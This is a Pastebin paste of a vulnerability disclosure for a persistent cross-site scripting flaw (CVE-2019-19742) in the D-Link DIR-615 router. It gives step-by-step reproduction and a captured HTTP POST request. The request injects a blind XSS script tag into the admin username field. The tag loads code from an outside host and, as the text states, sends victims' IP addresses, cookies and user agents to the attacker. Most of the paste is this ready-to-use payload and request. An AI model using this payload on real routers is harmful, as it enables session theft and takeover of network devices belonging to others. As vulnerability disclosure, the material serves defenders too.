infosecsanyam

D-Link DIR-615 Wireless Router — Persistent Cross-Site Scrip

Dec 17th, 2019
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.03 KB | None | 0 0
  1. ######################################################################################
  2.  
  3. # Exploit Title: D-Link DIR-615 Wireless Router — Persistent Cross Site Scripting
  4. # Date: 13.12.2019
  5. # Exploit Author: Sanyam Chawla
  6. # Vendor Homepage: http://www.dlink.co.in
  7. # Category: Hardware (Wi-fi Router)
  8. # Hardware Link: http://www.dlink.co.in/products/?pid=678
  9. # Hardware Version: T1
  10. # Firmware Version: 20.07
  11. # Tested on: Windows 10 and Kali linux
  12. # CVE: CVE-2019–19742
  13.  
  14. #######################################################################################
  15.  
  16. Reproduction Steps:
  17.  
  18.  — — — — — — — — — — — — — — — 
  19.  
  20. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
  21. Go to Maintenance page and click on Admin on the left pannel.
  22. Put blind XSS Payload in to the name field — “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
  23. Every refresh in the user home page, the XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
  24. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
  25. #######################################################################################
  26.  
  27. #Burp Intercept
  28.  
  29. POST /form2userconfig.cgi HTTP/1.1
  30. Host: 192.168.0.1
  31. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
  32. Gecko/20100101 Firefox/71.0
  33. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  34. Accept-Language: en-US,en;q=0.5
  35. Accept-Encoding: gzip, deflate
  36. Content-Type: application/x-www-form-urlencoded
  37. Content-Length: 180
  38. Origin: http://192.168.0.1
  39. Connection: close
  40. Referer: http://192.168.0.1/userconfig.htm
  41. Cookie: SessionID=
  42. Upgrade-Insecure-Requests: 1
  43.  
  44. username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
  45. <http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
Add Comment
Please, Sign In to add comment